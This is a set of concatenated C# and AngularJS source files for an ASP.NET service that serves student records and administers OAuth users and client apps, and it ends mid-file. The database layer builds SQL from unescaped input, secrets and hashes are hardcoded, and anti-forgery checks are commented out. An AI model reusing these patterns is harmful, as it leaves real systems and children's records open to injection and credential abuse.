_rethinkServiceMock.Verify(x=>x.GetAllStudentsAsync()); Assert.IsNotNull(response); } [TestMethod()] public void GetByStateTestNumberTest() { _rethinkServiceMock.Setup(x => x.GetStudentByStateNumberAsync(It.IsAny<string>())).Returns(GetResponse); var response = _rethinkController.GetByStateTestNumber(""); _rethinkServiceMock.Verify(x => x.GetStudentByStateNumberAsync("")); Assert.IsNotNull(response); } [TestMethod()] public void GetByIdentityTest() { _rethinkServiceMock.Setup(x => x.GetStudentByIdentityAsync(It.IsAny<string>(),It.IsAny<string>(),It.IsAny<string>())).Returns(GetResponse); var response = _rethinkController.GetByIdentity("", "", ""); _rethinkServiceMock.Verify(x => x.GetStudentByIdentityAsync("","","")); Assert.IsNotNull(response); } private Task<ResponseData<ChildInfo>> GetResponse() { var response = new Task<ResponseData<ChildInfo>>(() => new ResponseData<ChildInfo>()); return response; } } } <file_sep>using System; using System.Security.Policy; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Service; namespace PCG.GOAL.WebService { public class DbConfig { private const string HashInternal = "ADBx61Nqj+eqoVtXgTsp9bQ/UMZUpUovP0CLPL6rLYWavrE5pndozRPzhy/vDtGlKQ=="; private const string HashAdmin = "AG7Bxc/IpGq5SXqQDIN26kNbr4Y+jgw9GhfQ26XUls0nYWgoclLDslM9IDKTenBQ5w=="; private const string HashGoalView = "AFuLeuok3BFeogvkeFZwHAZEDbq5D/5UUaaladYFceKILn2QoWAZ6/VSk1Wjf6kFrw=="; private const string RoleAdmin = "Admin"; private const string GoalInternal = "goal_internal"; public static void Seeding() { try { // goal_internal var dbService = new DbService(new SqlDataAccess()); var user = dbService.GetCredentials(GoalInternal); if (user != null) { user.Password = <PASSWORD>; user.Role = "Admin"; dbService.UpdateCredentials(user); } else { dbService.AddCredentials(new Credentials { Username = GoalInternal, Password = <PASSWORD>, Role = RoleAdmin }); } // admin user = dbService.GetCredentials("admin"); if (user != null && user.Role != RoleAdmin) { user.Role = RoleAdmin; dbService.UpdateCredentials(user); } else if(user==null) { dbService.AddCredentials(new Credentials { Username = "admin", Password = <PASSWORD>, Role = RoleAdmin }); } // goal_internal var client = dbService.GetClientInfo(GoalInternal); if (client != null) { client.ClientSecret = <PASSWORD>; dbService.UpdateClientInfo(client); } else { dbService.AddClientInfo(new ClientInfo { ClientId = GoalInternal, ClientSecret = HashInternal }); } // goal_internal client = dbService.GetClientInfo("goalview"); if (client == null) { dbService.AddClientInfo(new ClientInfo { ClientId = "goalview", ClientSecret = HashGoalView }); } } catch (Exception e) { throw; } } public static string GetInternalToken(string baseUri) { var client = new WebServiceClient<string> { Credentials = new Credentials { ClientId = GoalInternal, ClientSecret = GoalInternal, Username = GoalInternal, Password = <PASSWORD> }, BaseUri = baseUri, TokenEndpoint = "token" }; return client.GetToken(); } } }<file_sep>using System; using System.Collections.Generic; using System.Data; using System.Linq; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.DataAccess { public class DbService : IDbService { private readonly ISqlDataAccess _sqlDataAccess; private const string GoalInternal = "goal_internal"; #region Constructor public DbService(ISqlDataAccess sqlDataAccess) { _sqlDataAccess = sqlDataAccess; } #endregion #region Credentials public IEnumerable<Credentials> GetAllCredentials() { var sqlStatement = string.Format("SELECT * FROM ServiceUser"); try { using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new Credentials { Id = (int)r["id"], Username = (string)r["username"], Password = (string)r["<PASSWORD>"], Role = r["role"] == DBNull.Value ? string.Empty : (string)r["role"] }); return data.Where(c => c.Username != GoalInternal).ToList(); } } catch (Exception e) { // log error throw; } } public Credentials GetCredentialsById(int id) { var sqlStatement = string.Format("SELECT * FROM ServiceUser WHERE id = '{0}'", id); using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new Credentials { Id = (int)r["id"], Username = (string)r["username"], Password = (string)r["<PASSWORD>"], Role = r["role"] == DBNull.Value ? string.Empty : (string)r["role"] }).FirstOrDefault(); return data; } } public Credentials GetCredentials(string username) { var sqlStatement = string.Format("SELECT * FROM ServiceUser WHERE USERNAME= '{0}'", username); using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new Credentials { Id = (int)r["id"], Username = (string)r["username"], Password = (string)r["<PASSWORD>"], Role = r["role"] == DBNull.Value ? string.Empty : (string)r["role"] }).FirstOrDefault(); return data; } } public void AddCredentials(Credentials credentials) { var sqlStatement = string.Format("INSERT INTO ServiceUser (username, password, role) VALUES ('{0}','{1}','{2}')", credentials.Username,credentials.Password,credentials.Role); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } public void UpdateCredentials(Credentials credentials) { var sqlStatement = string.Format("UPDATE ServiceUser SET username = '{0}', password = '{1}', role = '{2}' WHERE id = {3} ", credentials.Username, credentials.Password, credentials.Role,credentials.Id); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } public void DeleteCredentials(int id) { var sqlStatement = string.Format("DELETE ServiceUser WHERE id = '{0}'", id); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } #endregion #region ClientInfo public IEnumerable<ClientInfo> GetAllClientInfo() { var sqlStatement = string.Format("SELECT * FROM ServiceClient"); try { using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new ClientInfo { Id = (int)r["id"], ClientId = (string)r["clientid"], ClientSecret = (string)r["clientsecret"], Description = r["Description"] == DBNull.Value ? string.Empty : (string)r["Description"] }); return data.Where(c => c.ClientId != GoalInternal).ToList(); } } catch (Exception e) { // log error throw; } } public ClientInfo GetClientInfoById(int id) { var sqlStatement = string.Format("SELECT * FROM ServiceClient WHERE id = '{0}'", id); using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new ClientInfo { Id = (int)r["id"], ClientId = (string)r["clientid"], ClientSecret = (string)r["clientsecret"], Description = r["Description"] == DBNull.Value ? string.Empty : (string)r["Description"] }).FirstOrDefault(); return data; } } public ClientInfo GetClientInfo(string clientId) { var sqlStatement = string.Format("SELECT * FROM ServiceClient WHERE CLIENTID= '{0}'", clientId); using (var credentialsTable = _sqlDataAccess.GetTableBySql(sqlStatement)) { var data = credentialsTable.AsEnumerable().Select(r => new ClientInfo { Id = (int)r["id"], ClientId = (string)r["clientid"], ClientSecret = (string)r["clientsecret"], Description = r["Description"] == DBNull.Value ? string.Empty : (string)r["Description"] }).FirstOrDefault(); return data; } } public void AddClientInfo(ClientInfo clientInfo) { var sqlStatement = string.Format("INSERT INTO ServiceClient (clientid, clientsecret, description) VALUES ('{0}','{1}','{2}')", clientInfo.ClientId, clientInfo.ClientSecret,clientInfo.Description); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } public void UpdateClientInfo(ClientInfo clientInfo) { var sqlStatement = string.Format("UPDATE ServiceClient SET clientid = '{0}', clientsecret = '{1}', description = '{2}' WHERE id = {3} ", clientInfo.ClientId, clientInfo.ClientSecret,clientInfo.Description,clientInfo.Id); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } public void DeleteClientInfo(int id) { var sqlStatement = string.Format("DELETE ServiceClient WHERE id = '{0}'", id); try { _sqlDataAccess.ExecuteNonQuery(sqlStatement); } catch (Exception e) { // log error throw; } } #endregion } }<file_sep>using System.Collections.Generic; using System.Threading.Tasks; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.ExternalDataService.Interface { public interface IGoalService { Credentials Credentials { get; set; } IServiceConfig ServiceConfig { get; set; } Task<ResponseData<ChildInfo>> GetAllStudentsAsync(); Task<ResponseData<ChildInfo>> GetStudentByStateNumberAsync(string stateTestNumber); Task<ResponseData<ChildInfo>> GetStudentByIdentityAsync(string firstName, string lastName, string dob); } } <file_sep>using System.Net.Http; using System.Threading.Tasks; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class Content<T> : IContent where T : class { public HttpContent HttpContent { get; set; } public Task<string> ReadAsStringAsync() { return HttpContent.ReadAsStringAsync(); } } }<file_sep>using System; using System.Net; using System.Web.Mvc; namespace PCG.GOAL.WebService.Security { [AttributeUsage(AttributeTargets.Class | AttributeTargets.Method, Inherited = true, AllowMultiple = true)] public class MvcAuthorizeAttribute : AuthorizeAttribute { protected override void HandleUnauthorizedRequest(AuthorizationContext filterContext) { if (filterContext.HttpContext.Request.IsAuthenticated) { filterContext.Result = new HttpStatusCodeResult((int)HttpStatusCode.Forbidden); } else { base.HandleUnauthorizedRequest(filterContext); } } } }<file_sep>using System; using System.Net; using System.Net.Http; using System.Net.Http.Headers; using System.Threading.Tasks; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class Client<T> :IClient where T : class { public HttpClient HttpClient { get; set; } public HttpRequestHeader DefaultRequestHeaders { get; set; } public Client() { HttpClient=new HttpClient(); } public void SetAuthorization(AuthenticationHeaderValue header) { HttpClient.DefaultRequestHeaders.Authorization = header; } public void SetMediaType(MediaTypeWithQualityHeaderValue mediaType) { HttpClient.DefaultRequestHeaders.Accept.Add(mediaType); } public Task<HttpResponseMessage> GetAsync(Uri uri) { return HttpClient.GetAsync(uri); } public Task<HttpResponseMessage> PostAsync(Uri uri, HttpContent content) { return HttpClient.PostAsync(uri, content); } public Task<HttpResponseMessage> PutAsync(Uri uri, HttpContent content) { return HttpClient.PutAsync(uri, content); } } }<file_sep>using System; using System.Linq; using System.Linq.Expressions; using System.Threading.Tasks; namespace DataAccess.Common.Interfaces { public interface IRepository<T> where T : class { IQueryable<T> GetAll(); T GetById(int id); void Add(T entity); void Update(T entity); void Delete(T entity); void Delete(int id); IQueryable<T> Find(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); T Single(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); T First(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); Task<T> FirstAsync(Expression<Func<T, bool>> where, params Expression<Func<T, object>>[] includeProperties); } } <file_sep>(function () { angular.module('webServices') .controller('appAdminCtrl', ['$rootScope', '$scope', 'dataContext', '$state', '$stateParams', 'logService','dialogService', appAdminCtrl]); function appAdminCtrl($rootScope, $scope, dataContext, $state, $stateParams, logService, dialogService) { $scope.isFromEdit = true; $scope.hasApp = false; $scope.isEditMode = ($state.current.name !== 'clientApp'); $scope.backToAdmin = backToAdmin; $scope.deleteApp = deleteApp; $scope.saveApp = saveApp; // -- main function (function () { if ($scope.isEditMode && $stateParams.id) { getAppById($stateParams.id); $scope.title = 'Edit Application'; } else { $scope.title = 'Add Applications'; } resetApp(); getApps(); })(); // -- functions function backToAdmin() { $state.go("clientApp"); } function saveApp(formApp) { if (!formApp.$invalid) { dataContext.saveApp($scope.app) .success(function (data) { if (data.error) { toastr.warning(data.error.message); } else { getApps(); resetApp(); if ($scope.isEditMode) { $state.go('clientApp'); } toastr.success("Saved Successfully"); } }) .error(function (data, status, headers, config) { logService.logError(data); }); } else { toastr.warning("Please correct the validation errors"); } }; function getApps() { dataContext.getApps().success(function (data) { if (data && data.data) { $scope.appList = data.data; $scope.hasApp = $scope.appList.length > 0; } }); resetApp(); } function getAppById(id) { dataContext.getAppById(id) .success(function (data) { if (data && data.data) { $scope.app = data.data[0]; $scope.app.clientSecret = ''; $scope.app.isImportant = true; } }) .error(function (data, status, headers, config) { logService.logError(data); }); } function deleteApp(id) { dialogService.confirmModal("Delete", "Are you sure to delete this client?", funcDeleteClient); function funcDeleteClient() { dataContext.deleteApp(id).success(function (data) { getApps(); if (data && data.done === false) { toastr.error(data.message); } }).error(function (data, status, headers, config) { logService.logError(data); }); } } function resetApp() { $scope.app = { appName: '', clientId: '', clientSecret: '', description: '' }; } } })();<file_sep>namespace PCG.GOAL.Common.WebModels { public static class GrantTpype { public static string Password { get { return "<PASSWORD>"; } } public static string RefreshToken { get { return "refresh_token"; } } } } <file_sep>using System.Security.Claims; using System.Web; using System.Web.Helpers; using System.Web.Mvc; using Microsoft.AspNet.Identity; using Microsoft.Owin.Security; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.WebService.Models; namespace PCG.GOAL.WebService.Controllers { public class AuthenticationController : Controller { IAuthenticationManager Authentication { get { return HttpContext.GetOwinContext().Authentication; } } private readonly IOAuthValidator _oAuthValidator; public AuthenticationController(IOAuthValidator oAuthValidator) { _oAuthValidator = oAuthValidator; } [HttpGet] public ActionResult Login() { return View(); } [HttpPost] //[ValidateAntiForgeryToken] public ActionResult Login(LoginModel input) { if (ModelState.IsValid) { var credentials = _oAuthValidator.ValidateUser(input.Username, input.Password); if (credentials != null) { var password = <PASSWORD>.Hash<PASSWORD>(input.Password); var user = new Credentials { Username = input.Username, Password = <PASSWORD>, Role = credentials.Role }; var identity = new ClaimsIdentity(new[] { new Claim(ClaimTypes.Name, input.Username), new Claim(ClaimTypes.Role, user.Role) }, DefaultAuthenticationTypes.ApplicationCookie, ClaimTypes.Name, ClaimTypes.Role); // tell OWIN the identity provider, optional // identity.AddClaim(new Claim(IdentityProvider, "Simplest Auth")); Authentication.SignIn(new AuthenticationProperties { IsPersistent = input.RememberMe }, identity); return RedirectToAction("Index", "Home"); } ViewBag.LoginFailed = true; } return View("Login"); //return RedirectToAction("login"); } public ActionResult Logout() { Authentication.SignOut(DefaultAuthenticationTypes.ApplicationCookie); return RedirectToAction("login"); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net.Http; using System.Text; using System.Threading.Tasks; namespace PCG.GOAL.ExternalDataService.Interface { public interface IContent { Task<string> ReadAsStringAsync(); HttpContent HttpContent { get; set; } } } <file_sep>namespace PCG.GOAL.Common.Models { public class LessonObjective { public string ObjectiveText { get; set; } public LessonMasteryCriteria MasteryCriteria { get; set; } } }<file_sep>using System.Collections.Generic; using System.Data; using System.Data.SqlClient; namespace PCG.GOAL.Common.Interface { public interface ISqlDataAccess { SqlDataReader GetReaderBySql(string sqlStatement, bool closeConnection = true); SqlDataReader GetReader(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); object GetScalar(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); object GetScalar(string sqlStatement, bool closeConnection = true); int ExecuteNonQuery(string storedProcedureKey, List<SqlParameter> parameters, bool closeConnection = true); int ExecuteNonQuery(string sqlStatement, bool closeConnection = true); DataTable GetTableBySql(string sqlStatement, bool closeConnection = true); } }<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class ChildInfo { public int Id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public string DateOfBirth { get; set; } public string Grade { get; set; } public string Gender { get; set; } public string[] EducationalClassification { get; set; } public string LanguageAbility { get; set; } public string StateTestNumber { get; set; } public List<LessonInfo> Lessons { get; set; } public List<BehaviorInfo> Behaviors { get; set; } public string AreaOfConcern { get; set; } } }<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Web.Helpers; using System.Web.Http; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [ApiAuthorize(Roles = "Admin")] public class ServiceAdminController : ApiController { private readonly IDbService _dbService; public ServiceAdminController(IDbService dbService) { _dbService = dbService; } #region Credentials [Route("api/admin/credentials")] public IHttpActionResult GetCredentials() { try { var users = _dbService.GetAllCredentials(); return Ok(new ResponseData<Credentials> { Data = users.ToList(), Done = true }); } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/credentials/{id}")] [HttpGet] public IHttpActionResult GetCredentialsById(int id) { try { var user = _dbService.GetCredentialsById(id); if (user != null) { return Ok(new ResponseData<Credentials> { Data = new List<Credentials> { user }, Done = true }); } else { return Ok(new ResponseData<Credentials> { Data = null, Done = false }); } } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/DeleteCredentials/{id}")] [HttpGet] public IHttpActionResult DeleteCredentialsById(int id) { try { var user = _dbService.GetCredentialsById(id); if (user.Username.ToLower() == "admin") { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = "Cannot delete Admin!" }); } _dbService.DeleteCredentials(id); return Ok(new ResponseData<Credentials> { Data = null, Done = true }); } catch (Exception e) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = e.Message }); } } [HttpPost] [Route("api/admin/AddCredentials")] public IHttpActionResult SaveCredentials(Credentials credentials) { if (ModelState.IsValid) { try { var isInsert = credentials.Id == 0; credentials.Password = Crypto.HashPassword(credentials.Password); if (isInsert) { _dbService.AddCredentials(credentials); } else { _dbService.UpdateCredentials(credentials); } return Ok(new ResponseData<Credentials> { Data = new List<Credentials> { credentials }, Done = true }); } catch (Exception ex) { return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = ex.Message }); } } return Ok(new ResponseData<Credentials> { Data = null, Done = false, Message = "Model invalid" }); } #endregion #region ApiAppRegistrations [Route("api/admin/apps")] public IHttpActionResult GetApps() { try { var apps = _dbService.GetAllClientInfo(); return Ok(new ResponseData<ClientInfo> { Data = apps.ToList(), Done = true }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } [HttpPost] [Route("api/admin/addapp")] public IHttpActionResult SaveClient(ClientInfo clientInfo) { if (ModelState.IsValid) { try { var isInsert = clientInfo.Id == 0; clientInfo.ClientSecret = Crypto.HashPassword(clientInfo.ClientSecret); if (isInsert) { _dbService.AddClientInfo(clientInfo); } else { _dbService.UpdateClientInfo(clientInfo); } return Ok(new ResponseData<ClientInfo> { Data = new List<ClientInfo> { clientInfo }, Done = true }); } catch (Exception ex) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = ex.Message }); } } return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = "Model invalid" }); } [Route("api/admin/deleteapp/{id}")] [HttpGet] public IHttpActionResult DeleteAppById(int id) { try { //var client = _dbService.GetClientInfoById(id); _dbService.DeleteClientInfo(id); return Ok(new ResponseData<ClientInfo> { Data = null, Done = true }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } [Route("api/admin/app/{id}")] [HttpGet] public IHttpActionResult GetAppById(int id) { try { var client = _dbService.GetClientInfoById(id); if (client != null) { return Ok(new ResponseData<ClientInfo> { Data = new List<ClientInfo> { client }, Done = true }); } return Ok(new ResponseData<ClientInfo> { Data = null, Done = false }); } catch (Exception e) { return Ok(new ResponseData<ClientInfo> { Data = null, Done = false, Message = e.Message }); } } #endregion } } <file_sep>namespace PCG.GOAL.Common.Models { public class LessonMasteryCriteria { public string MinimumNoOfTrials { get; set; } public string ConsecutiveSessions { get; set; } public string SuccessPercentage { get; set; } } } <file_sep>using System; using System.Configuration; using System.Threading.Tasks; using System.Web.Http; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.WebService.Security; namespace PCG.GOAL.WebService.Controllers { [ApiAuthorize] public class RethinkController : ApiController { private readonly IGoalService _rethinkService; public RethinkController(IGoalService rethinkService) { _rethinkService = rethinkService; } [Route("api/rethink/student")] [HttpGet] public async Task<ResponseData<ChildInfo>> Get() { return await _rethinkService.GetAllStudentsAsync(); } [Route("api/rethink/StudentByStatetestnumber")] [HttpGet] public async Task<ResponseData<ChildInfo>> GetByStateTestNumber(string statetestnumber) { return await _rethinkService.GetStudentByStateNumberAsync(statetestnumber); } [Route("api/rethink/StudentByIdentity")] [HttpGet] public async Task<ResponseData<ChildInfo>> GetByIdentity(string firstName, string lastName, string dob) { return await _rethinkService.GetStudentByIdentityAsync(firstName, lastName, dob); } } } <file_sep>using System.Threading.Tasks; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.ExternalDataService.Service; namespace PCG.GOAL.WebService.Test.Service { [TestClass()] public class RethinkGoalServiceTests { public Mock<IWebServiceClient<ChildInfo>> ApiClientMock { get; set; } private IServiceConfig _serviceConfig; public RethinkGoalService GoalService { get; set; } [TestInitialize] public void RethinkGoalServiceTest() { _serviceConfig= new ServiceConfig{ApiKey = "key",BaseUrl = "http://base.com",ServiceEndpoint = "service",TokenEndpoint = "token"}; ApiClientMock= new Mock<IWebServiceClient<ChildInfo>>(); ApiClientMock.Setup(x => x.GetAsync(null)).Returns(GetResponse); GoalService = new RethinkGoalService(ApiClientMock.Object, _serviceConfig); GoalService.ServiceConfig=new ServiceConfig(); } [TestMethod()] public void GetAllChildrenAsyncTest() { // Act var responsData = GoalService.GetAllStudentsAsync(); // Assert ApiClientMock.Verify(x=>x.GetAsync(null)); Assert.IsNotNull(responsData); } [TestMethod()] public void GetAllChildByStateNumberAsyncTest() { // Act var responsData = GoalService.GetStudentByStateNumberAsync(stateTestNumber:""); // Assert ApiClientMock.Verify(x => x.GetAsync(null)); Assert.IsNotNull(responsData); } [TestMethod()] public void GetAllChildByIdentityAsyncTest() { // Act var responsData = GoalService.GetStudentByIdentityAsync(firstName:"",lastName:"",dob:""); // Assert ApiClientMock.Verify(x => x.GetAsync(null)); Assert.IsNotNull(responsData); } private Task<ResponseData<ChildInfo>> GetResponse() { var response = new Task<ResponseData<ChildInfo>>(()=>new ResponseData<ChildInfo>()); return response; } } } <file_sep>using System; using System.Collections.Generic; using System.Net; using System.Net.Http; using System.Threading.Tasks; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using Newtonsoft.Json; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.ExternalDataService.Service; namespace PCG.GOAL.WebService.Test.Service { [TestClass()] public class WebServiceClientTests { private Mock<IClient> _httpClientMock; private Mock<IContent> _responseContentMock; IWebServiceClient<ChildInfo> WebServiceClient { get; set; } [TestInitialize] public void TestInitialize() { _httpClientMock = new Mock<IClient>(); _responseContentMock = new Mock<IContent>(); WebServiceClient = new WebServiceClient<ChildInfo>(_httpClientMock.Object, _responseContentMock.Object); WebServiceClient.Credentials = new Credentials { Username = "admin", Password = "<PASSWORD>", ClientId = "goalview", ClientSecret = "goalview" }; WebServiceClient.BaseUri = "http://localhost"; WebServiceClient.TokenEndpoint = "/token"; } [TestMethod()] public void GetTokenTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetToken); _httpClientMock.Setup(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())).Returns(GetResponse); // Act var token = WebServiceClient.GetToken(); // Assert _httpClientMock.Verify(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); Assert.IsFalse(string.IsNullOrWhiteSpace(token)); } [TestMethod()] public void GetAsyncTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetStudent); _httpClientMock.Setup(x => x.GetAsync(It.IsAny<Uri>())).Returns(GetResponse); // Act var response = WebServiceClient.GetAsync(); // Assert _httpClientMock.Verify(x => x.GetAsync(It.IsAny<Uri>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); Assert.IsNotNull(response); } [TestMethod()] public void PostAsyncTest() { // Arrange _responseContentMock.Setup(x => x.ReadAsStringAsync()).Returns(GetStudent); _httpClientMock.Setup(x => x.PostAsync(It.IsAny<Uri>(), It.IsAny<HttpContent>())).Returns(GetResponse); // Act var response = WebServiceClient.PostAsync(new List<ChildInfo>()); // Assert _httpClientMock.Verify(x => x.PostAsync(It.IsAny<Uri>(),It.IsAny<HttpContent>())); _responseContentMock.Verify(x => x.ReadAsStringAsync()); Assert.IsNotNull(response); } [TestMethod()] public void PutAsyncTest() { // No requirement for Put Assert.IsTrue(true); } [TestMethod()] public void DeleteAsyncTest() { // No requirement for Delete Assert.IsTrue(true); } private async Task<HttpResponseMessage> GetResponse() { var requestMessage = new HttpRequestMessage(); requestMessage.RequestUri=new Uri("http://localhost/api/student?endpoint=abc"); var response = new HttpResponseMessage { StatusCode = HttpStatusCode.OK, RequestMessage = requestMessage }; return response; } private async Task<string> GetToken() { const string response = "{\"access_token\":\"abcde\",\"token_type\":\"bearer\",\"expires_in\":86399,\"refresh_token\":\"<PASSWORD>\"}"; return response; } private async Task<string> GetStudent() { var student = new ChildInfo(); var result = JsonConvert.SerializeObject(student); return result; } } } <file_sep>using System; using System.Configuration; using System.Threading.Tasks; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; namespace PCG.GOAL.ExternalDataService.Service { public class RethinkGoalService : IGoalService { public Credentials Credentials { get; set; } private readonly IWebServiceClient<ChildInfo> _apiClient; public IServiceConfig ServiceConfig { get; set; } public RethinkGoalService(IWebServiceClient<ChildInfo> apiClient, IServiceConfig serviceConfig = null) { _apiClient = apiClient; ServiceConfig = (serviceConfig == null || string.IsNullOrWhiteSpace(serviceConfig.ApiKey)) ? SetServiceConfig() : serviceConfig; _apiClient.BaseUri = ServiceConfig.BaseUrl; } public async Task<ResponseData<ChildInfo>> GetAllStudentsAsync() { _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}", ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey); var response = await _apiClient.GetAsync(); return response; } public async Task<ResponseData<ChildInfo>> GetStudentByStateNumberAsync(string stateTestNumber) { _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}&statetestnumber={2}", ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey, stateTestNumber); _apiClient.IsSingleResult = true; var response = await _apiClient.GetAsync(); return response; } public async Task<ResponseData<ChildInfo>> GetStudentByIdentityAsync(string firstName, string lastName, string dob) { //Date of Birth should be passed in YYYYMMDD format _apiClient.ServiceEndpoint = string.Format("{0}?apikey={1}&firstname={2}&lastname={3}&dob={4}", ServiceConfig.ServiceEndpoint, ServiceConfig.ApiKey, firstName, lastName, dob); _apiClient.IsSingleResult = true; var response = await _apiClient.GetAsync(); return response; } private ServiceConfig SetServiceConfig() { var serviceConfig = new ServiceConfig { BaseUrl = GetFromServiceConfig("Rethink_BaseUrl"), ServiceEndpoint = GetFromServiceConfig("Rethink_StudentEndpoint"), ApiKey = GetFromServiceConfig("Rethink_ApiKey") }; return serviceConfig; } private string GetFromServiceConfig(string key) { // todo: Rethink service configuration might be read from database instead of from Web.config // todo: this depends on requirement var value = ConfigurationManager.AppSettings[key]; if (string.IsNullOrWhiteSpace(value)) { throw new Exception("Failed to read Rethink Service Configuration."); } return value; } } } <file_sep>using System; using System.Web; using Microsoft.Web.Infrastructure.DynamicModuleHelper; using Ninject; using Ninject.Extensions.Conventions; using Ninject.Web.Common; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; using PCG.GOAL.Common.WebModels; using PCG.GOAL.ExternalDataService.Interface; using PCG.GOAL.ExternalDataService.Service; using PCG.GOAL.WebService; /**/ [assembly: WebActivatorEx.PreApplicationStartMethod(typeof(NinjectWebCommon), "Start")] [assembly: WebActivatorEx.ApplicationShutdownMethodAttribute(typeof(NinjectWebCommon), "Stop")] namespace PCG.GOAL.WebService { public static class NinjectWebCommon { private static readonly Bootstrapper bootstrapper = new Bootstrapper(); /// <summary> /// Starts the application /// </summary> public static void Start() { DynamicModuleUtility.RegisterModule(typeof(OnePerRequestHttpModule)); DynamicModuleUtility.RegisterModule(typeof(NinjectHttpModule)); bootstrapper.Initialize(CreateKernel); } /// <summary> /// Stops the application. /// </summary> public static void Stop() { bootstrapper.ShutDown(); } /// <summary> /// Creates the kernel that will manage your application. /// </summary> /// <returns>The created kernel.</returns> private static IKernel CreateKernel() { var kernel = new StandardKernel(); try { kernel.Bind<Func<IKernel>>().ToMethod(ctx => () => new Bootstrapper().Kernel); kernel.Bind<IHttpModule>().To<HttpApplicationInitializationHttpModule>(); RegisterServices(kernel); WebApiApplication.Kernel = kernel; return kernel; } catch { kernel.Dispose(); throw; } } /// <summary> /// Load your modules or register your services here! /// </summary> /// <param name="kernel">The kernel.</param> private static void RegisterServices(IKernel kernel) { kernel.Bind(x => { x.FromThisAssembly() // Scans currently assembly .SelectAllClasses() // Retrieve all non-abstract classes .BindDefaultInterface(); // Binds the default interface to them; }); kernel.Bind<IGoalService>().To<RethinkGoalService>(); kernel.Bind(typeof(IWebServiceClient<>)).To(typeof(WebServiceClient<>)); kernel.Bind<IServiceConfig>().To<ServiceConfig>(); kernel.Bind<IDbService>().To<DbService>(); kernel.Bind<IOAuthValidator>().To<OAuthValidator>(); kernel.Bind<ISqlDataAccess>().To<SqlDataAccess>(); } } } <file_sep>(function () { angular.module("webServices").config(configRoute); function configRoute($stateProvider, $urlRouterProvider) { $stateProvider .state('home', { url: "/" }) .state("credentials", { url: "/user", templateUrl: "/AppRoot/admin/userAdmin.html" }) .state("credentialsEdit", { url: "/credentials/:id", templateUrl: "/AppRoot/admin/userEdit.html" }) .state("clientApp", { url: "/app", templateUrl: "/AppRoot/admin/appAdmin.html" }) .state("clientAppEdit", { url: "/appedit/:id", templateUrl: "/AppRoot/admin/appEdit.html" }); $urlRouterProvider.otherwise('/user'); } })();<file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Net; using 